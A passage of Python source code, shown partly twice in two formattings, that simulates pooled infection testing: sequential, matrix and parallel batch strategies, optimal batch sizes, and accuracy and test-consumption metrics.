neg_batch.append(temp_batch)
elif random_table.min() < typeI_error:
pos_batch.append(temp_batch)
else:
neg_batch.append(temp_batch)
neg_batch = np.concatenate(neg_batch) if len(neg_batch) > 0 else np.array([
])
pos_batch = np.concatenate(pos_batch) if len(pos_batch) > 0 else np.array([
])
neg_batch[:, 1] = 0
individual_test, individual_con = conventional_test(pos_batch,
typeII_error, typeI_error, repeat=ind_repeat, seq=seq)
result = np.concatenate((individual_test, neg_batch))
result = result[result[:, 0].argsort()]
result = result.astype('int64')
return result, batch_consum + individual_con, individual_con
def fixed_batch_seq_test(subject_array, stop_rule, p, batch_size,
typeII_error, typeI_error, repeat, prob_threshold=0.3, seq=True):
"""
This function provides the parallel batch testing results for a given subject array.
Input:
subject_array(Numpy Array): an array contains subject id and subject's
condition (1 stands for infection and 0 stands for uninfection)
stop_rule (int): the number of positive batches to enter the individual testing phase
batch_size (int): batch size
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
repeat (int): the number of potential individual testing for the positive crossings
prob_threshold (float): if the infection rate of a batch is beyond prob_threshold,
the subjects on that batch will enter individual testing phase
seq (boolean): True stands for sequential testing. The test will end
when the test result is positive or run up the number of repetition.
False stands for simutanlous testing with majority voting.
Output:
result (Numpy Array): an array contains subjects' id and test results
consum (int): the total test consumption
individual_con (int): the test consumption for individual testings
"""
temp_list = []
neg_list = []
pos_list = []
consum = 0
temp = {'data': subject_array, 'NB_Num': 0, 'PB_Num': 0, 'p': p,
'batch_size': batch_size}
temp_list.append(temp)
new_list = []
neg_array = []
pos_array = []
while len(temp_list) > 0:
for i in temp_list:
temp0, temp1, temp_con, p0, p1, n0, n1 = helpfunction(i['data'],
i['p'], i['batch_size'], typeII_error, typeI_error)
temp0 = {'data': np.random.permutation(temp0), 'NB_Num': i[
'NB_Num'] + 1, 'PB_Num': i['PB_Num'], 'p': p0, 'batch_size':
batch_size}
temp1 = {'data': np.random.permutation(temp1), 'NB_Num': i[
'NB_Num'], 'PB_Num': i['PB_Num'] + 1, 'p': p1, 'batch_size':
batch_size}
if len(temp0['data']) > 0:
if temp0['NB_Num'] >= stop_rule:
neg_list.append(temp0)
else:
new_list.append(temp0)
if len(temp1['data']) > 0:
if temp1['PB_Num'] >= stop_rule or temp1['p'
] >= prob_threshold:
pos_list.append(temp1)
else:
new_list.append(temp1)
consum += temp_con
temp_list = new_list
new_list = []
for j in neg_list:
neg_array.append(j['data'])
neg_array = np.concatenate(neg_array)
for k in pos_list:
pos_array.append(k['data'])
pos_array = np.concatenate(pos_array)
neg_array[:, 1] = 0
individual_test, individual_con = conventional_test(pos_array,
typeII_error, typeI_error, repeat, seq)
pos_array = individual_test
consum += individual_con
result = np.concatenate((pos_array, neg_array))
result = result[result[:, 0].argsort()]
result = result.astype('int64')
return result, consum, individual_con
def name_fun(n):
"""
input: stopping rule
output: finish nodes
"""
output = []
temp = ['']
for i in range(2 * n - 1):
temp_cur = []
for j in temp:
candidate_pos = j + '+'
candidate_neg = j + '-'
if str.count(candidate_pos, '+') >= n:
output.append(candidate_pos)
else:
temp_cur.append(candidate_pos)
if str.count(candidate_neg, '-') >= n:
output.append(candidate_neg)
else:
temp_cur.append(candidate_neg)
temp = temp_cur
neg_symbol = [x for x in output if str.count(x, '-') == n]
pos_symbol = [x for x in output if str.count(x, '+') == n]
return output, neg_symbol, pos_symbol
def seq_test_with_node(subject_array, stop_rule, p, batch_size,
typeII_error, typeI_error, repeat=1, prob_threshold=1, seq=True,
batch_limit=32):
"""
A function gives the test results to a subject array and the total number of
test-kit consumption and the individual testing number given the subject array,
the stop rule, the batch size, the probability of type II error, the probability of
Type I error, and the number of repeatition, the probability threshold, and
setting of sequence testing or not.
Input:
subject_array(Numpy Array): an array contains subject id and subject's
condition (1 stands for infection and 0 stands for uninfection)
stop_rule (int): the number of postive batches to enter individual testing
p (float): infection rate
batch_size (int): batch size
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
repeat (int): the number of repetition
prob_threshold (float): if the infection rate of a batch is beyond prob_threshold,
the subjects on that batch will enter individual testing phase
seq (boolean): True stands for sequential testing. The test will end
when the test result is positive or run up the number of repetition.
False stands for simutanlous testing with majority voting.
batch_limit (int):
Output:
result (Numpy Array): an array contains subjects' id and test results
consum (int): the total test consumption
individual_con (int): the test consumption for individual testings
"""
temp_list = []
neg_list = []
pos_list = []
batch_num_list = []
consum = 0
temp = {'data': subject_array, 'NB_Num': 0, 'PB_Num': 0, 'p': p,
'batch_size': batch_size, 'node': ''}
temp_list.append(temp)
new_list = []
neg_array = []
neg_node = []
pos_node = []
pos_array = []
while len(temp_list) > 0:
for i in temp_list:
temp0, temp1, temp_con, p0, p1, n0, n1 = helpfunction(i['data'],
i['p'], i['batch_size'], typeII_error, typeI_error,
batch_limit=batch_limit)
temp0 = {'data': temp0, 'NB_Num': i['NB_Num'] + 1, 'PB_Num': i[
'PB_Num'], 'p': p0, 'batch_size': n0, 'node': i['node'] + '-'}
temp1 = {'data': temp1, 'NB_Num': i['NB_Num'], 'PB_Num': i[
'PB_Num'] + 1, 'p': p1, 'batch_size': n1, 'node': i['node'] +
'+'}
if len(temp0['data']) > 0:
if temp0['NB_Num'] >= stop_rule:
neg_list.append(temp0)
else:
new_list.append(temp0)
if len(temp1['data']) > 0:
if temp1['PB_Num'] >= stop_rule or temp1['p'
] >= prob_threshold:
pos_list.append(temp1)
else:
new_list.append(temp1)
consum += temp_con
batch_num_list.append(consum)
temp_list = new_list
new_list = []
for j in neg_list:
neg_array.append(j['data'])
temp = [[x, j['node']] for x in j['data'][:, 0]]
neg_node.append(temp)
neg_array = np.concatenate(neg_array)
for k in pos_list:
pos_array.append(k['data'])
temp = [[x, k['node']] for x in k['data'][:, 0]]
pos_node.append(temp)
pos_array = np.concatenate(pos_array)
neg_array[:, 1] = 0
individual_test, individual_con = conventional_test(pos_array,
typeII_error, typeI_error, repeat, seq)
pos_array = individual_test
consum += individual_con
result = np.concatenate((pos_array, neg_array))
pos_node.extend(neg_node)
node = pos_node
node = sum(node, [])
node.sort()
node = [x[1] for x in node]
result = result[result[:, 0].argsort()]
result = result.astype('int64')
return result, consum, individual_con, node, batch_num_list
<|reserved_special_token_1|>
import numpy as np
import pandas as pd
from sklearn.metrics import confusion_matrix
from sklearn.metrics import classification_report
from sklearn.metrics import precision_score, recall_score, f1_score
from scipy.optimize import fsolve
import numba
from numba import njit,jit
@jit(parallel = True)
def conventional_test(subject_array, typeII_error, typeI_error, repeat = 1,
seq = True):
"""
    A function that gives the test results for a subject array, given the probability of
    type II error, the probability of type I error, the number of repetitions,
    and whether the testing is sequential or not.
Input:
        subject_array (Numpy Array): an array containing subject ids and subjects'
        conditions (1 stands for infected and 0 stands for not infected)
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
repeat (int): the number of repetition
seq (boolean): True stands for sequential testing. The test will end
        when the test result is positive or the number of repetitions is used up.
        False stands for simultaneous testing with majority voting.
Output:
test_result (Numpy Array): an array contains subjects' id and test results
consum (int): the total test consumption
"""
# Sequential Testing
if seq == True:
consum = 0
test_result = np.zeros(subject_array.shape, dtype = int)
random_table = np.random.uniform(0, 1, (subject_array.shape[0], repeat))
for i in range(len(subject_array)):
temp = 0
j = 0
subject = subject_array[i,1]
while j < repeat and temp == 0:
random_num = random_table[i, j]
consum += 1
if subject == 1:
temp = 1 if random_num > typeII_error else 0
else:
temp = 1 if random_num < typeI_error else 0
j += 1
test_result[i,0] = subject_array[i,0]
test_result[i,1] = temp
return test_result, consum
    # Simultaneous Testing
else:
test_result = np.zeros(subject_array.shape, dtype = int)
random_table = np.random.uniform(0, 1, (subject_array.shape[0], repeat))
for i in range(len(subject_array)):
temp = 0
for j in range(repeat):
temp_random = random_table[i, j]
if subject_array[i, 1] == 1:
temp_1 = 1 if temp_random > typeII_error else 0
elif subject_array[i, 1] == 0:
temp_1 = 1 if temp_random < typeI_error else 0
temp += temp_1
temp = 1 if temp >= repeat/2 else 0
test_result[i,0] = subject_array[i,0]
test_result[i,1] = temp
return test_result, len(subject_array)*repeat
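
# Illustrative usage sketch for conventional (individual) testing; the subject
# conditions and error rates below are assumed values chosen only for
# demonstration.
def _example_conventional_test():
    # five subjects, of whom ids 1 and 3 are infected
    subjects = np.array([[0, 0], [1, 1], [2, 0], [3, 1], [4, 0]])
    results, consumption = conventional_test(
        subjects, typeII_error=0.05, typeI_error=0.01, repeat=2, seq=True)
    print(results)      # per-subject ids and test outcomes
    print(consumption)  # total number of test kits used
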
@njit(parallel = True)
def parallel_test(subject_array, typeII_error, typeI_error, num):
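    """
    Run `num` parallel tests on every subject and flag a subject as positive
    if any single test comes back positive: an infected subject is missed only
    when all `num` tests return false negatives, while a healthy subject is
    flagged when at least one test returns a false positive.
    Input:
        subject_array (Numpy Array): subject ids and true conditions
        typeII_error (float): probability of type II error
        typeI_error (float): probability of type I error
        num (int): the number of parallel tests per subject
    Output:
        test_result (Numpy Array): subject ids and test outcomes
        (int): the total test consumption
        (int): the individual test consumption (identical here)
    """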
test_result = np.zeros(subject_array.shape, dtype = int)
random_table = np.random.uniform(0, 1, (subject_array.shape[0], num))
for i in range(len(subject_array)):
subject = subject_array[i, 1]
if subject == 1:
temp = 1 if max(random_table[i,:]) > typeII_error else 0
elif subject == 0:
temp = 1 if min(random_table[i,:]) < typeI_error else 0
test_result[i,0] = subject_array[i,0]
test_result[i,1] = temp
return test_result,len(subject_array)*num,len(subject_array)*num
def infection_rate_on_negative_batch(p,batch_size,typeII_error, typeI_error):
"""
Given infection rate, batch size, prob of type II error and prob of type I error, this
function gives the infection rate on the negative batch.
Input:
p (float): the infection rate
batch_size (int): the batch size
typeII_error (float): the prob of type II error
typeI_error (float): the prob of type I error
Output:
(float): the infection rate on the negative batch
"""
q = 1-p
r = typeII_error * (1 - q ** batch_size)/((1 - typeI_error) * q ** batch_size + typeII_error *(1 - q**batch_size))
return p*r/(1-q**batch_size)
def infection_rate_on_positive_batch(p, batch_size, typeII_error, typeI_error):
"""
Given infection rate, batch size, prob of type II error and prob of type I error, this
function gives the infection rate on the positive batch.
Input:
p (float): the infection rate
batch_size (int): the batch size
typeII_error (float): the prob of type II error
typeI_error (float): the prob of type I error
Output:
(float): the infection rate on the positive batch
"""
q = 1-p
r = (1 - typeII_error) * (1 - q ** batch_size)/(typeI_error * q ** batch_size + (1 - typeII_error) * (1 - q **batch_size))
return p*r/(1 - q** batch_size)
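
# Worked example for the two posterior-rate formulas above; the prevalence,
# batch size and error rates are assumed values for illustration only.
def _example_batch_infection_rates():
    p, batch_size = 0.01, 10
    p_neg = infection_rate_on_negative_batch(p, batch_size, 0.05, 0.01)
    p_pos = infection_rate_on_positive_batch(p, batch_size, 0.05, 0.01)
    # expect p_neg << p < p_pos (roughly 0.0006 and 0.095 for these inputs)
    print(p_neg, p_pos)
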
def one_batch_test_solver(prevalence_rate,typeII_error, typeI_error,n_initial_guess = 2):
"""
A function gives (float) the best batch size for one batch test given the infection rate
Inputs:
prevalence_rate(float): infection rate
typeII_error(float): the prob of type II error
typeI_error(float): the prob of type I error
n_initial_guess(float): the initial guess
Output:
(float): the optimal batch size
"""
    q = 1 - prevalence_rate  # to be consistent with the notation of the document
func = lambda n : n*q**(n/2) - (-(1-typeII_error - typeI_error)*np.log(q))**(-1/2)
# print(func(n_initial_guess))
n_solution = fsolve(func, n_initial_guess)
return float(n_solution)
def one_batch_test_int_solver(prevalence_rate,typeII_error, typeI_error,batch_limit,n_initial_guess = 2):
"""
A function gives (int) the best batch size for one batch test given the infection rate
Inputs:
prevalence_rate(float): infection rate
        typeII_error (float): the prob of type II error
        typeI_error (float): the prob of type I error
        n_initial_guess (float): the initial guess for the solver
batch_limit (int): the upper limit of batch size
Output:
(int): the optimal batch size
"""
sol_float = one_batch_test_solver(prevalence_rate,typeII_error, typeI_error, n_initial_guess)
floor, ceil = np.floor(sol_float), np.ceil(sol_float)
func = lambda batch_size: 1/batch_size + 1 - typeII_error -(1 - typeII_error - typeI_error)*(1-prevalence_rate)**batch_size
if func(floor) < func(ceil):
temp = int(floor)
else:
temp = int(ceil)
if temp <= batch_limit:
return temp
else:
return int(batch_limit)
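
# Illustrative sketch of the batch-size solvers; the prevalence, error rates
# and batch limit are assumed values. The continuous solver returns a
# fractional size and the integer solver picks the better neighbouring
# integer, capped at batch_limit.
def _example_batch_size_solvers():
    n_float = one_batch_test_solver(0.01, typeII_error=0.05, typeI_error=0.01)
    n_int = one_batch_test_int_solver(0.01, 0.05, 0.01, batch_limit=32)
    print(n_float, n_int)  # roughly 10-11 for a 1% infection rate
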
def neg_pos_batch_split(subject_array, batch_size, typeII_error, typeI_error):
"""
    A function that gives the list of subjects on the negative batch(es),
    the list of subjects on the positive batch(es) and the test-kit
    consumption, given the probability of type II error and the
    probability of type I error.
    Input:
        subject_array (Numpy Array): an array containing subject ids and subjects'
        conditions (1 stands for infected and 0 stands for not infected)
batch_size (int): batch size
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
Output:
neg_batch (Numpy Array): an array of subjects on the negative batch(es)
        pos_batch (Numpy Array): an array of subjects on the positive batch(es)
test_consum (int): the number of test-kit consumptions
"""
neg_batch = []
pos_batch = []
test_consum = np.ceil(len(subject_array)/batch_size)
random_table = np.random.uniform(0, 1, int(test_consum))
i = 0
for temp_batch in np.array_split(subject_array, test_consum):
if 1 in (temp_batch[:,1]):
if random_table[i] > typeII_error:
pos_batch.append(temp_batch)
else:
neg_batch.append(temp_batch)
else:
if random_table[i] > typeI_error:
neg_batch.append(temp_batch)
else:
pos_batch.append(temp_batch)
i += 1
neg_batch = np.concatenate(neg_batch) if len(neg_batch) > 0 else np.array([])
pos_batch = np.concatenate(pos_batch) if len(pos_batch) > 0 else np.array([])
return (neg_batch, pos_batch, test_consum)
def helpfunction(subject_array, p, batch_size ,typeII_error, typeI_error, batch_limit):
"""
The helpfunction is a handy function to give the list of subjects on the
negative batch(es), the list of subjects on the postive batch(es), the
test-kit consumption, the infection rate on the negative batches, the
infection rate on the positive batches, the optimal batch size for
negative batches and the optimal batch size for positive batches.
Input:
        subject_array (Numpy Array): an array containing subject ids and subjects'
        conditions (1 stands for infected and 0 stands for not infected)
p (float): Infection rate
batch_size (int): batch size
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
batch_limit (int): batch size upper limit
Output:
temp0 (Numpy Array): an array of subjects on the negative batch(es)
        temp1 (Numpy Array): an array of subjects on the positive batch(es)
temp_con (int): the number of test-kit consumptions
p0 (float): the infection rate on the negative batches
p1 (float): the infection rate on the positive batches
n0 (float): the optimal batch size for the negative batches
n1 (float): the optimal batch size for the positive batches
"""
batch_size = min(batch_size, batch_limit)
p0 = infection_rate_on_negative_batch(p, batch_size, typeII_error, typeI_error)
p1 = infection_rate_on_positive_batch(p, batch_size, typeII_error, typeI_error)
n0= one_batch_test_int_solver(p0, typeII_error, typeI_error, batch_limit)
n1 = one_batch_test_int_solver(p1, typeII_error, typeI_error, batch_limit)
    if len(subject_array) == 0:
        # nothing to split: no subjects and no tests consumed in this step
        return (np.array([]), np.array([]), 0, p0, p1, n0, n1)
temp0, temp1, temp_con = neg_pos_batch_split(subject_array,batch_size,typeII_error, typeI_error)
return(temp0, temp1, temp_con, p0, p1, n0, n1)
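
# Illustrative sketch of one splitting step; the population size, prevalence,
# batch size and error rates are assumed values for demonstration.
def _example_helpfunction():
    population = data_gen(size=100, p=0.02)
    neg, pos, used, p0, p1, n0, n1 = helpfunction(
        population, p=0.02, batch_size=16,
        typeII_error=0.05, typeI_error=0.01, batch_limit=32)
    # subjects pooled into negative/positive batches, tests used this round,
    # updated rate estimates and recommended next batch sizes
    print(len(neg), len(pos), used, p0, p1, n0, n1)
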
def seq_test(subject_array,stop_rule,p, batch_size, typeII_error, typeI_error, repeat = 1,
prob_threshold = 1, seq = True, batch_limit = 32):
"""
A function gives the test results to a subject array and the total number of
test-kit consumption and the individual testing number given the subject array,
the stop rule, the batch size, the probability of type II error, the probability of
    type I error, the number of repetitions, the probability threshold, and the
    setting of sequential testing or not.
Input:
        subject_array (Numpy Array): an array containing subject ids and subjects'
        conditions (1 stands for infected and 0 stands for not infected)
        stop_rule (int): the number of positive batches required to enter individual testing
p (float): infection rate
batch_size (int): batch size
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
repeat (int): the number of repetition
prob_threshold (float): if the infection rate of a batch is beyond prob_threshold,
the subjects on that batch will enter individual testing phase
seq (boolean): True stands for sequential testing. The test will end
        when the test result is positive or the number of repetitions is used up.
        False stands for simultaneous testing with majority voting.
        batch_limit (int): the upper limit of the batch size
Output:
result (Numpy Array): an array contains subjects' id and test results
consum (int): the total test consumption
individual_con (int): the test consumption for individual testings
"""
temp_list = []
neg_list = [] #renamed to negativeInfoList
pos_list = [] #renamed to positiveInfoList
consum = 0
temp = {'data': subject_array,
'NB_Num': 0,
'PB_Num': 0,
'p': p,
'batch_size': batch_size}
temp_list.append(temp)
new_list = []
neg_array = [] #renamed to negativeBatches
pos_array = [] #renamed to positiveBatches
while len(temp_list) > 0:
for i in temp_list:
temp0, temp1, temp_con, p0, p1, n0, n1 = helpfunction(i['data'], i['p'], i['batch_size'],
typeII_error, typeI_error,
batch_limit = batch_limit)
temp0 = {'data': temp0,
'NB_Num': i['NB_Num'] + 1,
'PB_Num': i['PB_Num'],
'p': p0,
'batch_size': n0}
temp1 = {'data': temp1,
'NB_Num': i['NB_Num'],
'PB_Num': i['PB_Num'] + 1,
'p': p1,
'batch_size': n1}
if len(temp0['data']) > 0:
if temp0['NB_Num'] >= stop_rule:
neg_list.append(temp0)
else:
new_list.append(temp0)
if len(temp1['data'])>0:
if temp1['PB_Num'] >= stop_rule or temp1['p']>=prob_threshold:
pos_list.append(temp1)
else:
new_list.append(temp1)
consum += temp_con
temp_list = new_list
new_list = []
for j in neg_list:
neg_array.append(j['data'])
neg_array = np.concatenate(neg_array)
for k in pos_list:
pos_array.append(k['data'])
pos_array = np.concatenate(pos_array)
neg_array[:,1] = 0
individual_test, individual_con = conventional_test(pos_array, typeII_error, typeI_error, repeat, seq)
pos_array = individual_test
consum += individual_con
result = np.concatenate((pos_array, neg_array))
result = result[result[:,0].argsort()]
result = result.astype('int64')
return (result, consum, individual_con)
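
# End-to-end sketch of the sequential batch-splitting test; every parameter
# value below is an assumption chosen only for demonstration. With
# stop_rule=2, a subject is cleared after two negative batch results or sent
# to individual testing after two positive batch results.
def _example_seq_test():
    population = data_gen(size=1000, p=0.01)
    pred, total_tests, individual_tests = seq_test(
        population, stop_rule=2, p=0.01, batch_size=16,
        typeII_error=0.05, typeI_error=0.01,
        repeat=2, prob_threshold=0.3, seq=True, batch_limit=32)
    accuracy = np.mean(pred[:, 1] == population[:, 1])
    print(accuracy, total_tests, individual_tests)
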
def npv_score(y_true, y_pred):
"""
    A function that provides the NPV (negative predictive value) given the prediction and the truth
"""
tn, _, fn, _ = confusion_matrix(y_true = y_true,
y_pred = y_pred).ravel()
return tn/(tn + fn)
def specificity_score(y_true, y_pred):
"""
    A function that provides the specificity given the prediction and the truth
"""
tn, fp, _, _ = confusion_matrix(y_true = y_true,
y_pred = y_pred).ravel()
return tn/(tn + fp)
@jit(parallel = True)
def data_gen(size, p):
"""
data_gen provides a faster way to generate a random population with
infection rate p.
Input:
size (int): the size of population
p (float): the infection rate
Output:
test_array (array): the first column is for id and the second column
        is the condition, where 1 stands for infected and 0 stands for not infected
"""
#print(np.random.get_state()[1][0])
random_table = np.random.binomial(size = size, p = p, n = 1)
test_array = np.zeros((size, 2), dtype = int)
for i in range(size):
test_array[i,0] = i
test_array[i,1] = random_table[i]
return test_array
def test_result(data, seq_test, **kwargs):
"""
    a helper function that summarises the evaluation results for a given test method with its **kwargs
Input:
data (array or list of arrays)
seq_test (test_method object): could be seq_test, matrix_test and other test_method objects
Output:
result (DataFrame): a dataframe contains important evaluation metrics for the test method
"""
if isinstance(data, list) == False:
pred,consum, ind_con = seq_test(data, **kwargs)
result = {'acc': np.mean(pred[:,1] == data[:,1]),
'sens': recall_score(data[:,1], pred[:,1]),
'spec': specificity_score(data[:,1], pred[:,1]),
'PPV': precision_score(data[:, 1], pred[:,1]),
'NPV': npv_score(data[:, 1], pred[:,1]),
'test_consum': consum,
'ind_consum': ind_con,
'batch_consum': consum - ind_con}
return result
else:
length = len(data)
acc = np.zeros(length)
sens = np.zeros(length)
spec = np.zeros(length)
ppv = np.zeros(length)
npv = np.zeros(length)
test_consum = np.zeros(length)
ind_consum = np.zeros(length)
batch_consum = np.zeros(length)
for i in range(length):
pred,consum, ind_con = seq_test(data[i], **kwargs)
acc[i] = np.mean(pred[:,1] == data[i][:,1])
sens[i] = recall_score(data[i][:,1], pred[:,1])
spec[i] = specificity_score(data[i][:,1], pred[:,1])
ppv[i] = precision_score(data[i][:,1], pred[:,1])
npv[i] = npv_score(data[i][:,1], pred[:,1])
test_consum[i] = consum
ind_consum[i] = ind_con
batch_consum[i] = consum-ind_con
result = {'acc': acc,
'sens': sens,
'spec': spec,
'PPV': ppv,
'NPV': npv,
'test_consum': test_consum,
'ind_consum': ind_consum,
'batch_consum': batch_consum}
return pd.DataFrame(result)
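
# Illustrative evaluation sketch: run the same strategy on several simulated
# populations and summarise the metrics in one DataFrame. All parameter
# values are assumptions for demonstration.
def _example_test_result():
    populations = [data_gen(size=1000, p=0.01) for _ in range(5)]
    summary = test_result(
        populations, seq_test,
        stop_rule=2, p=0.01, batch_size=16,
        typeII_error=0.05, typeI_error=0.01,
        repeat=2, prob_threshold=0.3, seq=True, batch_limit=32)
    print(summary.mean())  # average accuracy, sensitivity, consumption, ...
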
def matrix_test(subject_array, side_length, typeII_error, typeI_error, sq_repeat = 1 ,ind_repeat = 1, seq = True):
"""
This function provides the matrix testing results for a given subject array.
Input:
        subject_array (Numpy Array): an array containing subject ids and subjects'
        conditions (1 stands for infected and 0 stands for not infected)
side_length (int): the side length of the matrix testing
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
sq_repeat (int): the number of parallel testing for the column/row batch testing
ind_repeat (int): the number of potential individual testing for the positive crossings
seq (boolean): True stands for sequential testing. The test will end
        when the test result is positive or the number of repetitions is used up.
        False stands for simultaneous testing with majority voting.
Output:
result (Numpy Array): an array contains subjects' id and test results
consum (int): the total test consumption
individual_con (int): the test consumption for individual testings
"""
matrix_test_num = len(subject_array)//(side_length**2)
matrix_test_array = subject_array[0:matrix_test_num*side_length**2, :]
ind_test_array = subject_array[matrix_test_num*side_length**2:, :]
ind_idx = []
for temp_batch in np.array_split(matrix_test_array, matrix_test_num):
temp_batch = temp_batch.reshape(side_length, side_length, 2)
temp_row = []
temp_col = []
random_num_row = np.random.uniform(0, 1, sq_repeat)
random_num_col = np.random.uniform(0, 1, sq_repeat)
for i in range(side_length):
if 1 in (temp_batch[i,:,1]):
if max(random_num_row) > typeII_error:
temp_row.append(temp_batch[i,:,0])
else:
if min(random_num_row) < typeI_error:
temp_row.append(temp_batch[i, :, 0])
if 1 in (temp_batch[:,i,1]):
if max(random_num_col) > typeII_error:
temp_col.append(temp_batch[:,i,0])
else:
if min(random_num_col) < typeI_error:
temp_col.append(temp_batch[:, i, 0])
ind_idx.append(np.intersect1d(temp_row, temp_col))
ind_idx = np.concatenate(ind_idx)
ind_idx = ind_idx.astype('int')
if len(ind_idx) == 0:
neg_array = matrix_test_array
else:
mask = np.zeros(subject_array.shape[0], dtype = bool)
mask[ind_idx] = True
mask[matrix_test_num*side_length**2:] = True
ind_test_array = subject_array[mask,:]
neg_array = subject_array[~mask, :]
neg_array[:, 1] = 0
ind_test, ind_con = conventional_test(ind_test_array,
typeII_error, typeI_error, repeat = ind_repeat, seq = seq)
batch_test_num = matrix_test_num * 2 * side_length * sq_repeat
result = np.concatenate((neg_array, ind_test))
result = result[result[:, 0].argsort()]
return (result, batch_test_num + ind_con, ind_con)
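
# Illustrative sketch of matrix (array) pooling: a 10x10 grid per batch with
# one row test and one column test each, followed by individual confirmation
# of flagged crossings. Parameter values are assumptions for demonstration.
def _example_matrix_test():
    population = data_gen(size=1000, p=0.01)
    pred, total_tests, individual_tests = matrix_test(
        population, side_length=10, typeII_error=0.05, typeI_error=0.01,
        sq_repeat=1, ind_repeat=2, seq=True)
    print(np.mean(pred[:, 1] == population[:, 1]), total_tests)
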
def parallel_batch_testing(subject_array, batch_size, typeII_error, typeI_error, parallel_num, ind_repeat, seq):
"""
This function provides the parallel batch testing results for a given subject array.
Input:
        subject_array (Numpy Array): an array containing subject ids and subjects'
        conditions (1 stands for infected and 0 stands for not infected)
batch_size (int): batch size
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
parallel_num (int): the number of parallel testing for the batch testing
ind_repeat (int): the number of potential individual testing for the positive batches
seq (boolean): True stands for sequential testing. The test will end
        when the test result is positive or the number of repetitions is used up.
        False stands for simultaneous testing with majority voting.
Output:
result (Numpy Array): an array contains subjects' id and test results
consum (int): the total test consumption
individual_con (int): the test consumption for individual testings
"""
neg_batch = []
pos_batch = []
batch_consum = np.ceil(len(subject_array)/batch_size)* parallel_num
for temp_batch in np.array_split(subject_array, np.ceil(len(subject_array)/batch_size)):
random_table = np.random.uniform(0, 1, (1, parallel_num))
if 1 in (temp_batch[:, 1]):
if random_table.max() > typeII_error:
pos_batch.append(temp_batch)
else:
neg_batch.append(temp_batch)
else:
if random_table.min() < typeI_error:
pos_batch.append(temp_batch)
else:
neg_batch.append(temp_batch)
neg_batch = np.concatenate(neg_batch) if len(neg_batch) > 0 else np.array([])
pos_batch = np.concatenate(pos_batch) if len(pos_batch) > 0 else np.array([])
neg_batch[:, 1] = 0
individual_test, individual_con = conventional_test(pos_batch, typeII_error, typeI_error,
repeat = ind_repeat, seq = seq)
result = np.concatenate((individual_test, neg_batch))
result = result[result[:,0].argsort()]
result = result.astype('int64')
return (result, batch_consum+individual_con, individual_con)
def fixed_batch_seq_test(subject_array,stop_rule, p, batch_size, typeII_error, typeI_error, repeat, prob_threshold = 0.3, seq = True):
"""
This function provides the parallel batch testing results for a given subject array.
Input:
        subject_array (Numpy Array): an array containing subject ids and subjects'
        conditions (1 stands for infected and 0 stands for not infected)
stop_rule (int): the number of positive batches to enter the individual testing phase
batch_size (int): batch size
typeII_error (float): probability of type II error
typeI_error (float): probability of type I error
repeat (int): the number of potential individual testing for the positive crossings
prob_threshold (float): if the infection rate of a batch is beyond prob_threshold,
the subjects on that batch will enter individual testing phase
seq (boolean): True stands for sequential testing. The test will end
        when the test result is positive or the number of repetitions is used up.
        False stands for simultaneous testing with majority voting.
Output:
result (Numpy Array): an array contains subjects' id and test results
consum (int): the total test consumption
individual_con (int): the test consumption for individual testings
"""
temp_list = []
neg_list = []
pos_list = []
consum = 0
temp = {'data': subject_array,
'NB_Num': 0,
'PB_Num': 0,
'p': p,
'batch_size': batch_size}
temp_list.append(temp)
new_list = []
neg_array = []
pos_array = []
while len(temp_list) > 0:
for i in temp_list:
            # the batch size is fixed in this strategy, so cap the solver at batch_size
            temp0, temp1, temp_con, p0, p1, n0, n1 = helpfunction(i['data'], i['p'], i['batch_size'],
                                                                   typeII_error, typeI_error,
                                                                   batch_limit=batch_size)
temp0 = {'data': np.random.permutation(temp0),
'NB_Num': i['NB_Num'] + 1,
'PB_Num': i['PB_Num'],
'p': p0,
'batch_size': batch_size}
temp1 = {'data': np.random.permutation(temp1),
'NB_Num': i['NB_Num'],
'PB_Num': i['PB_Num'] + 1,
'p': p1,
'batch_size': batch_size}
if len(temp0['data']) > 0:
if temp0['NB_Num'] >= stop_rule:
neg_list.append(temp0)
else:
new_list.append(temp0)
if len(temp1['data'])>0:
if temp1['PB_Num'] >= stop_rule or temp1['p']>=prob_threshold:
pos_list.append(temp1)
else:
new_list.append(temp1)
consum += temp_con
temp_list = new_list
new_list = []
for j in neg_list:
neg_array.append(j['data'])
neg_array = np.concatenate(neg_array)
for k in pos_list:
pos_array.append(k['data'])
pos_array = np.concatenate(pos_array)
neg_array[:,1] = 0
individual_test, individual_con = conventional_test(pos_array, typeII_error, typeI_error, repeat, seq)
pos_array = individual_test
consum += individual_con
result = np.concatenate((pos_array, neg_array))
result = result[result[:,0].argsort()]
result = result.astype('int64')
return (result, consum, individual_con)
def name_fun(n):
"""
    Input: n (int): the stopping rule, i.e. the number of identical batch results that closes a path
    Output: all finish nodes, the negative finish nodes and the positive finish nodes,
    each encoded as a string of '+' and '-' batch results
"""
output = []
temp = ['']
for i in range(2*n-1):
temp_cur = []
for j in temp:
candidate_pos = j + '+'
candidate_neg = j + '-'
if str.count(candidate_pos, '+') >= n:
output.append(candidate_pos)
else:
temp_cur.append(candidate_pos)
if str.count(candidate_neg, '-') >= n:
output.append(candidate_neg)
else:
temp_cur.append(candidate_neg)
temp = temp_cur
neg_symbol = [x for x in output if str.count(x, '-') == n]
pos_symbol = [x for x in output if str.count(x, '+') == n]
return output, neg_symbol, pos_symbol
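
# Small worked example: with a stopping rule of 2, name_fun enumerates every
# test path that ends after two '+' or two '-' batch results.
def _example_name_fun():
    all_nodes, neg_nodes, pos_nodes = name_fun(2)
    print(all_nodes)  # ['++', '--', '+-+', '+--', '-++', '-+-']
    print(neg_nodes)  # ['--', '+--', '-+-']
    print(pos_nodes)  # ['++', '+-+', '-++']
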
def seq_test_with_node(subject_array,stop_rule,p, batch_size, typeII_error, typeI_error, repeat = 1,
prob_threshold = 1, seq = True, batch_limit = 32):
"""
A function gives the test results to a subject array and the total number of
test-kit consumption and the individual testing number given the subject array,
the stop rule, the batch size, the probability of type II error, the probability of
    type I error, the number of repetitions, the probability threshold, and the
    setting of sequential testing or not.
Input:
        subject_array (Numpy Array): an array containing subject ids and subjects'
        conditions (1 stands for infected and 0 stands for not infected)
        stop_rule (int): the number of positive batches required to enter individual testing
p (float): infection rate
batch_size (int): batch size
typeII_error (float): probability of type II error
